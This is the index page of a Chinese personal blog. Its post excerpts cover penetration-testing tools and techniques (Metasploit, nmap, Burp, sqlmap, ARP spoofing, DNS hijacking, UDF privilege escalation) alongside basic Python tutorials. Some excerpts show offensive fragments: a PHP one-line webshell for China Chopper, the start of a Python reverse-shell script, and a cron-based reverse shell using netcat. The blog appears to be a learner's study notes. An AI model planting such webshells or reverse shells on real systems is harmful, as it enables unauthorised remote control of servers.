秋水的博客

原创 内网转发

内网转发简介在渗透测试中，当我们获得了外网服务器（如web服务器，ftp服务器，mali服务器等等）的一定权限后发现这台服务器可以直接或者间接的访问内网。此时渗透测试进入后渗透阶段，一般情况下，内网中的其他机器是不允许外网机器访问的。这时候，我们可以通过 端口转发(隧道) 或将这台外网服务器设置成为 代理，使得我们自己的攻击机可以直接访问与操作内网中的其他机器。实现这一过程的手段就叫做内网转...

原创 MSF的辅助扫描模块（信息搜集）

nslookup工具这个工具kali和windows都可以直接使用，此工具分为两种模式1、非交互模式 nslookup –qt=类型 目标域名 （默认查询类型是a 地址记录IPV4） nslookup -qt=类型 目标域名 指定的DNS服务器IP或域名2、交互模式 nslookup 【Enter】 进入交互行模式 set qt=类型...

原创 记一次失败的PentestBox的MSF更新

首先你要看一下自己的源gem sources -l 亲身体会，gem的源可以不更换当然你也可以试试，也许只是我出现了这个问题gem sources -r https://rubygems.org/ ##移除默认源gem sources -a http://rubygems.org/ ##新增源gem sources --add http://rubygem...

转载 Metasploit Framework(MSF)的使用

MetasploitMetasploit Framework(MSF)是一款开源安全漏洞检测工具，附带数千个已知的软件漏洞，并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程，被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的，但是再后来的新版中，改成了用Ruby语言编写的了。在kali中，自带了Metaspl...

原创 DNS域传送漏洞

DNS简介DNS的认识DNS（Domain Name System，域名系统），因特网上作为域名和IP地址相互映射的一个分布式数据库，能够使用户更方便的访问互联网，而不用去记住能够被机器直接读取的IP数串。通过主机名，最终得到该主机名对应的IP地址的过程叫做域名解析（或主机名解析）。DNS协议运行在UDP协议之上，使用端口号53。在RFC文档中RFC 2181对DNS有规范说明，RFC ...

原创 MSF的密码爆破模块

密码生成工具genpAss一句话介绍这个工具就是：中国特色的弱密码生成器下载地址：https://github.com/RicterZ/genpAss密码泄露查询：https://monitor.firefox.com/https://haveibeenpwned.com/指令-n #名字-u #用户名-q #QQ号...

原创 CVE-2019-0708复现尝试

写在开始：这是我这个笔记写的最后一句话，我花了两天，主要是告诉大家，莫慌慌我试了好多都没成功简介这个时候写，其实已经很晚了，主要是学到了msf，正好拿这个说一下吧目前法出的exp版本依然是针对win7 sp1和2008R2，其他的应该是无效的0x00 环境搭建靶机：win7旗舰版sp1-->>ip：192.168.1.120攻击机：kali 2019....

原创 MSF的简单使用

MSF简介背景Metasploit Framework最初是 HD Moore 个人的想法，当时他在一家安全公司工作，他于2003年10月发布了第一个基于Perl的Metasploit版本，一开始只有共11个漏洞利用程序。后来随着Spoonm帮助和加入，HD发布于2004年4月重写了该项目并发布了Metasploit2.0。此版本包括19个漏洞和超过27个payload。在这个版本之发布...

转载 虚拟机ping不通主机，但是主机可以ping通虚拟机

我在Windows10系统安装了虚拟机，设置的主机与虚拟机的连接方式是桥接，安装好后，发现虚拟机ping不通主机，但是主机可以ping通虚拟机。我的操作是：关闭防火墙，发现虚拟机可以ping通主机了。说明是Windows10防火墙阻止了。现在存在的问题是：如果我一直关闭防火墙也不是个事啊？这样做会影响我的电脑安全的。于是我想我要先确定防火墙阻止了什么，导致需要关闭防火墙？于是网上查看...

原创 EtterCap工具的使用

EtterCap简介什么事ARP欺骗？ARP欺骗的运作原理是由攻击者发送假的ARP数据包到网上，尤其是送到网关上。其目的是要让送至特定的IP地址的流量被错误送到攻击者所取代的地方。因此攻击者可将这些流量另行转送到真正的网关（被动式数据包嗅探，passive sniffing）或是篡改后再转送（中间人攻击，man-in-the-middle attack）。攻击者亦可将ARP数据包导到不存...

原创 DNS劫持

DNS劫持简介什么是DNS？一提起DNS，我们就能想到DNS服务器，这是提供域名解析服务的再互联网中，计算机之间的通信靠的是ip地址，计算机时不会根据域名去寻找另外一台计算机的而我们的DNS服务器可以把某个域名指向某个地址，这就是域名解析比如我们在ping百度的时候，会得到来自xxx的回复注意：正常情况下，我们应该是可以通过IP直接访问网站的，但是，有些网站做了I...

原创 Namp的简单使用

怎么安装就不再多说了，百度安装windows版的也行直接使用linux里面的也行Nmap简介Nmap (“Network Mapper(网络映射器)”) 是一款开放源代码的网络探测和安全审核的工具。它的设计目标是快速地扫描大型网络，当然用它扫描单个主机也没有问题Nmap以新颖的方式使用原始IP报文来发现网络上有哪些主机，那些主机提供什么服务(应用程序名和版本)，那些服务运行在什么...

转载 【逻辑漏洞技巧拓展】————8、业务逻辑漏洞探索之敏感信息泄露

本文中提供的例子均来自网络已公开测试的例子，仅供参考。近期，万豪酒店被爆近5亿客人的信息或泄露。近年来，用户隐私泄露事件时有发生，也不得不给我们敲响警钟。敏感信息时业务系统中的保密性要求较高的数据，通常包括系统敏感信息和引用敏感信息。系统敏感信息指的是业务系统本身的基础环境信息，比如系统信息，中间件版本之类的，一旦泄露可能可以协助攻击者提供更多的攻击途径和方法；应用敏感信息指的是应用中存储...

转载 ctf/web源码泄露及利用办法【总结中】

.hg源码泄漏漏洞成因：hg init的时候会生成.hge.g.http://www.am0s.com/.hg/漏洞利用：工具：dvcs-ripperrip-hg.pl -v -u http://www.am0s.com/.hg/.git源码泄漏漏洞成因：在运行git init初始化代码库的时候，会在当前目录下面产生一个.git的隐藏文件，用来记录代码的变更记录等...

转载 漏洞挖掘中的常见的源码泄露

这几天一直想写点啥，偶然间，逛我们团长 小艾 的博客，我看到一个文章，题目是 " 常见的web 源码泄露漏洞 "，其中记录了好多源码泄露，但是我就见过其中三个，所以就想着总结一份挖洞中常见的源码泄露吧。小艾那篇文章的地址：http://www.htmlsec.com/?p=50在记录之前，我为了证明我的想法，我以关键词 ' 源码泄露 ' 在乌云漏洞库刷了一遍案例。一共 300 ...

原创 信息搜集工具使用

首先说明一下，本章节介绍的工具都很简单layer子域名收集工具如果要使用自定义字典，请把字典文件命名为dic，放到跟程序同目录下，程序会自动加载字典。如果没有自定义字典，程序会自动使用内置字典，内置字典总共两万多条数据，内容包括了常用子域名，以及3000+常用单词和1-3位所有字母。如果要爆破二级以下域名，可以直接填入要爆破的子域名，程序会自动拼接下一级子域。比如填入hi.bai...

原创 Xray扫描器

简介xray是一款可以使用HTTP/HTTPS代理进行被动扫描的安全工具，支持功能如下独立的 URL 扫描 基于 HTTP 的被动代理扫描，同时支持HTTPS SQL注入检测模块 命令注入检测模块 任意重定向检测模块 路径遍历模块Xray扫描器内置插件XSS漏洞检测 (key: xss)：利用语义分析的方式检测XSS漏洞 SQL 注入检测 (key: sqldet...

原创 Appscan的安装和使用

工具简介IBM AppScan是一款非常好用且功能强大的Web 应用安全测试工具，曾以 Watchfire AppScan 的名称享誉业界，Rational AppScan 可自动化 Web 应用的安全漏洞评估工作，能扫描和检测所有常见的 Web 应用安全漏洞，例如 SQL 注入（SQL-injection）、跨站点脚本攻击（cross-site scripting）、缓冲区溢出（buffe...

原创 Fiddler下载和简单使用

Fiddler简介Fiddler是一个http协议调试代理工具，它能够记录并检查所有你的电脑和互联网之间的http通讯，设置断点，查看所有的“进出”Fiddler的数据（指cookie,html,js,css等文件，甚至这些数据都可以任由你修改）。 Fiddler 要比其他的网络调试器要更加简单，它不仅仅暴露http通讯还提供了一个用户友好的格式工作原理Fiddler是位于客户端...

原创 Nessus的安装和使用

简介Nessus号称是世界上最流行的漏洞扫描程序，全世界有超过75000个组织在使用它。该工具提供完整的电脑漏洞扫描服务，并随时更新其漏洞数据库。Nessus不同于传统的漏洞扫描软件，Nessus可同时在本机或远端上遥控，进行系统的漏洞分析扫描。对应渗透测试人员来说，Nessus是必不可少的工具之一Nessus不仅可以扫描网站，还可以扫描主机。它由一个执行任务的服务端，和一个分配任务...

原创 AWVS的安装和使用（linux）

个人不太喜欢windows版的，这里页只介绍Linux版的安装下载首先说明：支持正版下载地址：https://pan.baidu.com/s/1D7eb2mQSuL26VvlRKbUtHQ提取码：dwes下载完成之后，把安装包拷贝到或者上传到linux服务器安装前步骤对文件进行解压可参考：https://blog.csdn.net/u013381011/...

原创 Burpsite的简单使用

Burp的简单使用安装部分不在描述，下载专业版模块的详细介绍请参考文章：https://www.cnblogs.com/ichunqiu/p/7234655.html在这里我只列出初级阶段比较常用的模块Proxy代理模块Proxy模块下属四个小模块Intercept： 拦截数据包的一个功能 HTTP histiory：http 历史，即是所有数据包的一个历史记录 ...

原创 sqlmap安装和使用

原创 web管理工具篇

中国菜刀下载链接：https://pan.baidu.com/s/1sR7xSsixIjOSQxJNCAdc_Q提取码：h8al打开才到页面如下首先，我在本地写了个一句话木马<?php@eval($_REQUEST['a']);?>连接一句话木马步骤右键-->添加，如下图a是我们一句话的密码连接成功如下图：...

原创 Ubuntu下安装docker

docker简介Docker：是一个开源的引擎，可以轻松的为任何应用创建一个轻量级的，可移植的，自给自足的容器。Docker的核心概念：镜像、仓库、容器Docker镜像：是一个特殊的文件系统，提供容器运行时所需的程序、库、资源、配置等文件外，还包含了一些为运行时准备的一些配置参数（如匿名卷、环境变量、用户等）。Docker利用容器（Container）：来运行应用。容器是从镜像...

原创 UDF提权

0x00 简介看到了一些文章，有MySQL的udf提权，也有MSSQL的udf提权，这里以MySQL为例udf是什么？udf = "user defined function"，即用户自定义函数是通过添加新函数，对MYSQL的功能进行扩充，性质就象使用本地MYSQL函数如abs()或concat()如果mysql版本小于5.1， udf.dll文件在windows ser...

转载 udf.dll源码

mysql是一个常用的数据库系统,应用极广泛,如果得到一个mysql的用户权限,如果提升呢,下面这个思路很先进!但得有一定编程基础!　　现在网上通过mysql获得系统权限大都通过MYSQL的用户函数接口UDF，比如Mix.dll和my_udf.dll。在Mix.dll中有一个MixConnect函数它会反弹shell，但是使用这个函数会造成MYSQL假死，前些天我就用这个函数反弹sh...

转载 python subprocess模块使用总结

一、subprocess以及常用的封装函数运行python的时候，我们都是在创建并运行一个进程。像Linux进程那样，一个进程可以fork一个子进程，并让这个子进程exec另外一个程序。在Python中，我们通过标准库中的subprocess包来fork一个子进程，并运行一个外部的程序。subprocess包中定义有数个创建子进程的函数，这些函数分别以不同的方式创建子进程，所以我们可以根据...

原创 python反弹shell（linux）

第一种代码如下标准输入 (stdin) ：代码为 0 ，使用 < 或 << 标准输出 (stdout)：代码为 1 ，使用 > 或 >> 标准错误输出(stderr)：代码为 2 ，使用 2> 或 2>>import socket,subprocess,oss=socket.socket(socket.AF_...

原创 python模块学习（四）

os模块首先这部分可能跟文件的独写有关系，文件独写部分可参照文章python基础语法（七）os.getcwd()方法获取当前工作目录，即当前python脚本工作的目录路径，此函数无传参os.chdir("dirname")改变当前脚本工作目录；相当于shell下cdos.name输出字符串指示当前使用平台。win->'nt'; Linux-...

原创 ubuntu计划任务反弹shell

实验环境ubuntu 14.04 x64位：192.168.1.115kali/win10：192.168.1.108/107所用工具：netcat（瑞士军刀）计划任务至于计划任务是什么我觉大不需要太多解释，就是定时执行任务的意思那么接下来看看计划任务的格式，以及书写crond 是linux用来定期执行程序的命令，如果未安装需要先安装，不在多说cron服务提供cr...

原创 Ubuntu报错（E: Some packages could not be authenticated）

今天打开了我另外一台电脑许久未开的虚拟机，打算做一波实验，很长时间不开了，安装新的软件时给我爆出了E: Some packages could not be authenticated错误，经过查找解决办法原因： 　　　表示系统无法验证这个软件包. 要想验证这个软件包, 则需要安装debian的公钥。 深层原因：　　Debian的公钥有效期是1年, 也就是说没隔1年需要更换一次公钥...

原创 python模块学习（三）

requests模块请求方法requests.get()：获取HTML网页的主要方法，对应于HTTP的GET requests.post()：向HTML网页提交POST请求的方法，对应于HTTP的POST requests.head()：获取HTML网页头信息的方法，对应于HTTP的HEAD requests.put()：向HTML网页提交PUT请求，对应于HTTP的PUT re...

原创 python模块学习（二）

发送邮件smtplib模块本章节尝试使用python发送邮件，学会百度，第一件事自然是百度不用逐一点进去看就能知道：1.Python可以解决这个问题；2.方法是smtplib，email这两个模块而且还会知道：smtplib是用来发送邮件用的，email是用来构建邮件内容的。这两个都是Python内置模块关于smtplib模块需要向smtplib模块输入...

原创 python模块学习（一）

csv模块csv是一种文件格式，你可以把它理解成“简易版excel”。学会了csv模块，你就可以用程序处理简单的电子表格了如果要手动新建csv文件，我们可以先新建一个excel表格，然后选择另存为“csv”格式即可使用import语句导入csv模块，然后用dir()函数看看它里面有什么东西中文教程：https://yiyibooks.cn/xx/python_35...

原创 python模块初识

模块简介什么是模块？用书里的话说：模块是最高级别的程序组织单元。这句话的意思是，模块什么都能封装函数可以封装变量 类可以封装函数和变量 那么模块就是封装类、函数和变量像我们使用pycharm每次写代码之前都要创建一个.py文件，这个文件本质上就是一个模块，我在在这个项目中也可以导入我们自己创建的模块模块的导入和使用比如我们先创建一个自己写的python文件--&gt...

原创 python基础语法（七）

文件读写编码问题平时最烦看到的就是乱码了在Python3当中，程序处理我们输入的字符串，是默认使用Unicode编码的，所以你什么语言都可以输入。数据在硬盘上存储，或者是在网络上传输时，用的是UTF-8，因为节省空间。但你不必操心如何转换UTF-8和Unicode，当我们点击保存的时候，程序已经“默默地”帮我们做好了编码工作。 一些中文的文件和中文网站，还在使用GBK，和GB2...

原创 python基础语法（六）

类与对象话不多说了，不扯什么是类，直接写格式class 类名: a = '666' #类的属性 def test(): #定义类的方法 print(a) #方法体类的调用既然定义了类，我们肯定是得想办法调用，与其他语言不同，python不需要new，但其实跟new也差不多class Computer: screen =...

原创 python基础语法（五）

函数什么是函数？函数是组织好的、可以重复使用的、用来实现单一功能的代码同样函数分为python的内置函数和自定义的函数像print()、len()、type()等函数属于内置函数函数的定义和调用下面看看再python中是怎么定义函数的def 函数名(参数): 函数体 return 语句下面我们定义一个简单函数，来实现y=2x+1的计算，如...

原创 python小练习（一）

人机PK小游戏明确项目要实现什么效果，然后对对项目进行拆解第一阶段的代码，我们的主要任务是理清战斗的逻辑，再用print()函数将战斗过程打印在终端第一阶段代码实现但是这样，所有的信息一下载全都打印了出来，感觉相当别扭引入time模块，再代码头部导入time模块，import time模块的语法为：time.sleep(secs) //secs代表...